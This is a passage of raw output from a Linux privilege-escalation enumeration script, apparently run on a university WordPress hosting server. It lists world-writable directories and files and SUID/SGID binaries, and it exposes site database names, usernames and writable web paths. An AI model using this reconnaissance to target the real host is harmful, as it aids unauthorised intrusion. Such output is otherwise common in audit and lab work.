  4081. [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
  4082.  
  4083. [+] World Writeable Directories for User/Group 'Root'
  4084. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/mqueue
  4085. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/shm
  4086. drwxrwxrwt 2 root root 4096 Nov 20 22:24 /tmp
  4087. drwxrwxrwt 2 root root 6 Oct 27 08:41 /var/tmp
  4088. drwxrwxrwt 2 root root 4096 Mar 5 2015 /home/virtualmin-autoreply
  4089.  
  4090. [+] World Writeable Directories for Users other than Root
  4091. drwxrwxrwx 2 programacion programacion 4096 Jul 7 22:07 /home/servertest/public_html/.tmb
  4092. drwxrwxrwx 2 programacion programacion 4096 Oct 1 2014 /home/servertest/public_html/wp-content/backup-db
  4093. drwxrwxrwx 4 programacion programacion 4096 Sep 11 09:44 /home/servertest/public_html/wp-content/uploads/filebase
  4094. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/.tmp
  4095. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes
  4096. drwxrwxrwx 2 programacion programacion 4096 Nov 3 2014 /home/servertest/public_html/wp-content/uploads/backwpup-8adfde-logs
  4097.  
  4098. [+] World Writable Files
  4099. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/hugetlb/cgroup.event_control
  4100. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/user.slice/cgroup.event_control
  4101. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dovecot.service/cgroup.event_control
  4102. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/webmin.service/cgroup.event_control
  4103. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postfix.service/cgroup.event_control
  4104. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/rsyslog.service/cgroup.event_control
  4105. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/mailman.service/cgroup.event_control
  4106. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postgresql.service/cgroup.event_control
  4107. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/system-getty.slice/cgroup.event_control
  4108. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/NetworkManager.service/cgroup.event_control
  4109. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-logind.service/cgroup.event_control
  4110. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dbus.service/cgroup.event_control
  4111. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/saslauthd.service/cgroup.event_control
  4112. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/vmware-tools.service/cgroup.event_control
  4113. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/avahi-daemon.service/cgroup.event_control
  4114. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/auditd.service/cgroup.event_control
  4115. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-journald.service/cgroup.event_control
  4116. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/cgroup.event_control
  4117. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/cgroup.event_control
  4118. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/perf_event/cgroup.event_control
  4119. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/memory/cgroup.event_control
  4120. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpuset/cgroup.event_control
  4121. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/blkio/cgroup.event_control
  4122. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/freezer/cgroup.event_control
  4123. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/net_cls,net_prio/cgroup.event_control
  4124. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpu,cpuacct/cgroup.event_control
  4125. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/pids/cgroup.event_control
  4126. --w--w--w- 1 root root 0 Nov 20 21:00 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-150671.scope/cgroup.event_control
  4127. --w--w--w- 1 root root 0 Sep 8 11:23 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-103530.scope/cgroup.event_control
  4128. --w--w--w- 1 root root 0 Jul 10 11:40 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-64611.scope/cgroup.event_control
  4129. --w--w--w- 1 root root 0 Jul 6 11:52 /sys/fs/cgroup/systemd/user.slice/user-0.slice/cgroup.event_control
  4130. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/user.slice/cgroup.event_control
  4131. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/httpd.service/cgroup.event_control
  4132. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/mariadb.service/cgroup.event_control
  4133. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/sshd.service/cgroup.event_control
  4134. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/irqbalance.service/cgroup.event_control
  4135. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/proftpd.service/cgroup.event_control
  4136. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/firewalld.service/cgroup.event_control
  4137. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/tuned.service/cgroup.event_control
  4138. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/polkit.service/cgroup.event_control
  4139. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/named.service/cgroup.event_control
  4140. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/usermin.service/cgroup.event_control
  4141. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/lvm2-lvmetad.service/cgroup.event_control
  4142. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/systemd-udevd.service/cgroup.event_control
  4143. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/crond.service/cgroup.event_control
  4144. --w--w--w- 1 root root 0 Jul 6 11:54 /sys/fs/cgroup/systemd/system.slice/run-user-0.mount/cgroup.event_control
  4145. --w--w--w- 1 root root 0 Jun 19 11:50 /sys/fs/cgroup/systemd/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
  4146. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kdump.service/cgroup.event_control
  4147. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/zabbix.service/cgroup.event_control
  4148. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/network.service/cgroup.event_control
  4149. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dovecot.service/cgroup.event_control
  4150. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/webmin.service/cgroup.event_control
  4151. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postfix.service/cgroup.event_control
  4152. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rsyslog.service/cgroup.event_control
  4153. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/mailman.service/cgroup.event_control
  4154. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postgresql.service/cgroup.event_control
  4155. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager-wait-online.service/cgroup.event_control
  4156. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager.service/cgroup.event_control
  4157. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-dmesg.service/cgroup.event_control
  4158. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-user-sessions.service/cgroup.event_control
  4159. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-update-utmp.service/cgroup.event_control
  4160. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dbus.service/cgroup.event_control
  4161. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/vmware-tools.service/cgroup.event_control
  4162. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/avahi-daemon.service/cgroup.event_control
  4163. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-logind.service/cgroup.event_control
  4164. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/saslauthd.service/cgroup.event_control
  4165. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
  4166. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/auditd.service/cgroup.event_control
  4167. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-import-state.service/cgroup.event_control
  4168. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/quotaon.service/cgroup.event_control
  4169. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-quotacheck.service/cgroup.event_control
  4170. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/home.mount/cgroup.event_control
  4171. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/boot.mount/cgroup.event_control
  4172. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/lvm2-monitor.service/cgroup.event_control
  4173. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2dname\x2dcentos\x2dswap.swap/cgroup.event_control
  4174. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-dm\x2d0.swap/cgroup.event_control
  4175. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2duuid\x2dLVM\x2dJ7dZz4eTLW2UFHCRD37o3mIQ3cb9eRc7KOFxiMuBAdJZ4E6rHfysA3owGCuGU5kT.swap/cgroup.event_control
  4176. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2duuid-7c17174f\x2dabc6\x2d414c\x2d9225\x2d1aa89dc3d427.swap/cgroup.event_control
  4177. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-centos-swap.swap/cgroup.event_control
  4178. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
  4179. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journal-flush.service/cgroup.event_control
  4180. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-readonly.service/cgroup.event_control
  4181. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mapper-centos\x2dswap.swap/cgroup.event_control
  4182. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
  4183. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-random-seed.service/cgroup.event_control
  4184. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-udev-trigger.service/cgroup.event_control
  4185. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-remount-fs.service/cgroup.event_control
  4186. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-sysctl.service/cgroup.event_control
  4187. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kmod-static-nodes.service/cgroup.event_control
  4188. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-config.mount/cgroup.event_control
  4189. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-vconsole-setup.service/cgroup.event_control
  4190. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/-.mount/cgroup.event_control
  4191. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-fsck-root.service/cgroup.event_control
  4192. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journald.service/cgroup.event_control
  4193. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-hugepages.mount/cgroup.event_control
  4194. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-systemd\x2dfsck.slice/cgroup.event_control
  4195. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/getty@tty1.service/cgroup.event_control
  4196. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/cgroup.event_control
  4197. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-selinux\x2dpolicy\x2dmigrate\x2dlocal\x2dchanges.slice/cgroup.event_control
  4198. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mqueue.mount/cgroup.event_control
  4199. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-debug.mount/cgroup.event_control
  4200. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/cgroup.event_control
  4201. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/cgroup.event_control
  4202. -rw-rw-rw- 1 root root 27767 Nov 20 02:04 /var/log/wordpress/wp_incidencias.log
  4203. -rw-rw-rw- 1 root root 3786 Oct 22 02:03 /var/log/wordpress/wp_incidencias.log-20171022.gz
  4204. -rw-rw-rw- 1 root root 8495 Oct 29 02:03 /var/log/wordpress/wp_incidencias.log-20171029.gz
  4205. -rw-rw-rw- 1 root root 8254 Nov 6 02:03 /var/log/wordpress/wp_incidencias.log-20171106.gz
  4206. -rw-rw-rw- 1 root root 9055 Nov 12 02:04 /var/log/wordpress/wp_incidencias.log-20171112.gz
  4207. -rw-rw-rw- 1 root root 8231 Nov 19 02:04 /var/log/wordpress/wp_incidencias.log-20171119.gz
  4208. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c(2).pdf
  4209. -rw-rw-rw- 1 programacion programacion 81069 Sep 26 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jornadas_Acogida.pdf
  4210. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN(2).pdf
  4211. -rw-rw-rw- 1 programacion programacion 70412 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767201.pdf
  4212. -rw-rw-rw- 1 programacion programacion 72972 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767901.pdf
  4213. -rw-rw-rw- 1 programacion programacion 70939 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767304.pdf
  4214. -rw-rw-rw- 1 programacion programacion 389213 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767301.pdf
  4215. -rw-rw-rw- 1 programacion programacion 70194 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767303.pdf
  4216. -rw-rw-rw- 1 programacion programacion 71144 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767209.pdf
  4217. -rw-rw-rw- 1 programacion programacion 71849 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767203.pdf
  4218. -rw-rw-rw- 1 programacion programacion 70923 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767308.pdf
  4219. -rw-rw-rw- 1 programacion programacion 71146 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767207.pdf
  4220. -rw-rw-rw- 1 programacion programacion 70580 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767204.pdf
  4221. -rw-rw-rw- 1 programacion programacion 70602 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767103.pdf
  4222. -rw-rw-rw- 1 programacion programacion 70766 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767202.pdf
  4223. -rw-rw-rw- 1 programacion programacion 70653 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767101.pdf
  4224. -rw-rw-rw- 1 programacion programacion 70848 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767307.pdf
  4225. -rw-rw-rw- 1 programacion programacion 69433 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767306.pdf
  4226. -rw-rw-rw- 1 programacion programacion 71413 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767206.pdf
  4227. -rw-rw-rw- 1 programacion programacion 71257 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767102.pdf
  4228. -rw-rw-rw- 1 programacion programacion 70827 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767208.pdf
  4229. -rw-rw-rw- 1 programacion programacion 69950 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767302.pdf
  4230. -rw-rw-rw- 1 programacion programacion 71346 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767205.pdf
  4231. -rw-rw-rw- 1 programacion programacion 70735 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767305.pdf
  4232. -rw-rw-rw- 1 programacion programacion 116774 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/ElPuerto_ESI.pdf
  4233. -rw-rw-rw- 1 programacion programacion 1201842 Jul 9 2015 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI(2).pdf
  4234. -rw-rw-rw- 1 programacion programacion 133401 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI.pdf
  4235. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN.pdf
  4236. -rw-rw-rw- 1 programacion programacion 267246 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/SanFernando_ESI.pdf
  4237. -rw-rw-rw- 1 programacion programacion 1107723 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/dossierterritoriohackathoncadiz.pdf
  4238. -rw-rw-rw- 1 programacion programacion 257265 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Chiclana_ESI.pdf
  4239. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2(2).pdf
  4240. -rw-rw-rw- 1 programacion programacion 114345 Oct 20 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cartel LEAN 2014 (UCA-ESI).pdf
  4241. -rw-rw-rw- 1 programacion programacion 150466 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cadiz_ESI.pdf
  4242. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2.pdf
  4243. -rw-rw-rw- 1 programacion programacion 287022 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jerez_ESI.pdf
  4244. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN(2).pdf
  4245. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c.pdf
  4246. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN.pdf
  4247. -rw-rw-rw- 1 programacion programacion 34242 Sep 30 2014 /home/servertest/public_html/wp-content/uploads/filebase/706582079_2092012184719.pdf
  4248. -rw-rw-rw- 1 programacion programacion 1574 Sep 29 2015 /home/servertest/public_html/wp-content/uploads/filebase/noticias_rss
  4249.  
  4250. [+] Checking if root's home folder is accessible
  4251.  
  4252. [+] SUID/SGID Files and Directories
  4253. drwxrwsr-x 2 root mailman 60 Apr 1 2017 /run/mailman
  4254. drwxr-sr-x 3 root systemd-journal 60 Apr 1 2017 /run/log/journal
  4255. drwxr-s---+ 2 root systemd-journal 240 Nov 20 16:10 /run/log/journal/fbaa8e75089f4810a59659296fb78a09
  4256. drwxrwsr-x 2 root mailman 80 Nov 20 22:20 /run/lock/mailman
  4257. -rwsr-s---. 1 root root 439 Mar 5 2015 /etc/yum.repos.d/virtualmin.repo
  4258. drwxrwsr-x. 3 root mailman 57 Jul 9 2015 /etc/mailman
  4259. drws--S--- 2 mysql epsalgeciras 19 Jul 9 2015 /var/lib/mysql/epsalgeciras
  4260. drws--S--- 2 mysql epsalgeciras 12288 Sep 15 13:11 /var/lib/mysql/epsalgeciras_wordpress
  4261. drws--S--- 2 mysql imeymat 8192 Sep 12 10:52 /var/lib/mysql/imeymat
  4262. drws--S--- 2 mysql master 19 Mar 28 2016 /var/lib/mysql/master
  4263. drws--S--- 2 mysql master 4096 Nov 20 21:20 /var/lib/mysql/master_wordpress
  4264. drws--S--- 2 mysql gradosindustriales 4096 Dec 16 2016 /var/lib/mysql/gradosindustriales
  4265. drws--S--- 2 mysql ccsociales 19 Jun 7 2016 /var/lib/mysql/ccsociales
  4266. drws--S--- 2 mysql ccsociales 4096 Sep 22 02:01 /var/lib/mysql/ccsociales_wordpress
  4267. drws--S--- 2 mysql ciencias 8192 Sep 22 02:01 /var/lib/mysql/ciencias
  4268. drws--S--- 2 mysql default 49 Aug 2 2016 /var/lib/mysql/default
  4269. drws--S--- 2 mysql iuila 19 Feb 15 2017 /var/lib/mysql/iuila
  4270. drws--S--- 2 mysql iuila 4096 Sep 22 02:00 /var/lib/mysql/iuila_wordpress
  4271. drws--S--- 2 mysql enfyfis 4096 Sep 22 02:02 /var/lib/mysql/enfyfis
  4272. drws--S--- 2 mysql indess 19 May 9 2017 /var/lib/mysql/indess
  4273. drws--S--- 2 mysql indess 4096 Nov 17 08:20 /var/lib/mysql/indess_wordpress
  4274. drws--S--- 2 mysql caiv 4096 Sep 22 02:02 /var/lib/mysql/caiv
  4275. drws--S--- 2 mysql epsalgeciras1 19 Jun 19 13:02 /var/lib/mysql/epsalgeciras1
  4276. drws--S--- 2 mysql epsalgeciras1 16384 Oct 4 11:32 /var/lib/mysql/epsalgeciras1_wordpress
  4277. drws--S--- 2 mysql economicas 4096 Sep 22 02:00 /var/lib/mysql/economicas
  4278. drws--S--- 2 mysql programacion 12288 Oct 27 08:40 /var/lib/mysql/programacion
  4279. drws--S--- 2 mysql masingind 19 Oct 25 10:49 /var/lib/mysql/masingind
  4280. drws--S--- 2 mysql masingind 4096 Oct 25 10:52 /var/lib/mysql/masingind_wordpress
  4281. drwxrwsr-x. 6 root mailman 55 Jun 24 2015 /var/lib/mailman
  4282. drwxrwsr-x. 4 root mailman 33 Jun 24 2015 /var/lib/mailman/archives
  4283. drwxrws---. 4 apache mailman 39 Jun 24 2015 /var/lib/mailman/archives/private
  4284. drwxrwsr-x. 2 root mailman 20 Jun 24 2015 /var/lib/mailman/archives/public
  4285. drwxrwsr-x. 2 root mailman 25 Jul 9 2015 /var/lib/mailman/data
  4286. drwxrwsr-x. 3 root mailman 20 Jun 24 2015 /var/lib/mailman/lists
  4287. drwxrwsr-x. 2 root mailman 45 Nov 20 12:00 /var/lib/mailman/lists/mailman
  4288. drwxrwsr-x. 2 root mailman 6 Jun 24 2015 /var/lib/mailman/spam
  4289. drwxrwsr-x. 11 root mailman 4096 Jun 24 2015 /var/spool/mailman
  4290. drwxrws---. 2 root mailman 6 Mar 5 2015 /var/spool/mailman/virgin
  4291. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/archive
  4292. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/shunt
  4293. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/out
  4294. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/commands
  4295. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/retry
  4296. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/bounces
  4297. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/news
  4298. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/in
  4299. -r-xr-sr-x. 1 root tty 15344 Jun 10 2014 /usr/bin/wall
  4300. -rwsr-xr-x 1 root root 44232 Apr 12 2017 /usr/bin/mount
  4301. -rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
  4302. -rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
  4303. -rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
  4304. -rws--x--x 1 root root 23960 Apr 12 2017 /usr/bin/chfn
  4305. -rwsr-xr-x 1 root root 32096 Apr 12 2017 /usr/bin/su
  4306. -rws--x--x 1 root root 23872 Apr 12 2017 /usr/bin/chsh
  4307. -rwsr-xr-x 1 root root 31968 Apr 12 2017 /usr/bin/umount
  4308. -rwxr-sr-x 1 root tty 19536 Apr 12 2017 /usr/bin/write
  4309. ---s--x--x 1 root root 130752 Jun 22 22:02 /usr/bin/sudo
  4310. -rwsr-xr-x 1 root root 27680 May 25 21:46 /usr/bin/pkexec
  4311. -rwsr-xr-x 1 root root 57552 Mar 31 2016 /usr/bin/crontab
  4312. -rwxr-sr-x 1 root mail 19800 Nov 20 2015 /usr/bin/lockfile
  4313. ---x--s--x 1 root nobody 306360 Apr 12 2017 /usr/bin/ssh-agent
  4314. -rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
  4315. -rwsr-sr-x. 1 root root 7144 May 10 2007 /usr/bin/procmail-wrapper
  4316. -rwx--s--x 1 root slocate 40512 Nov 5 2016 /usr/bin/locate
  4317. -rwsr-xr-x 1 root root 11224 Nov 6 2016 /usr/sbin/pam_timestamp_check
  4318. -rwsr-xr-x 1 root root 36280 Nov 6 2016 /usr/sbin/unix_chkpwd
  4319. -rwxr-sr-x 1 root root 11224 Apr 12 2017 /usr/sbin/netreport
  4320. -rwsr-xr-x 1 root root 11296 Apr 12 2017 /usr/sbin/usernetctl
  4321. -rwxr-sr-x. 1 root postdrop 218552 Jun 10 2014 /usr/sbin/postdrop
  4322. -rwxr-sr-x. 1 root postdrop 259992 Jun 10 2014 /usr/sbin/postqueue
  4323. -rwsr-xr-x 1 root root 15432 May 25 21:46 /usr/lib/polkit-1/polkit-agent-helper-1
  4324. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admin
  4325. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admindb
  4326. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/confirm
  4327. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/create
  4328. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/edithtml
  4329. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/listinfo
  4330. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/options
  4331. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/private
  4332. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/rmlist
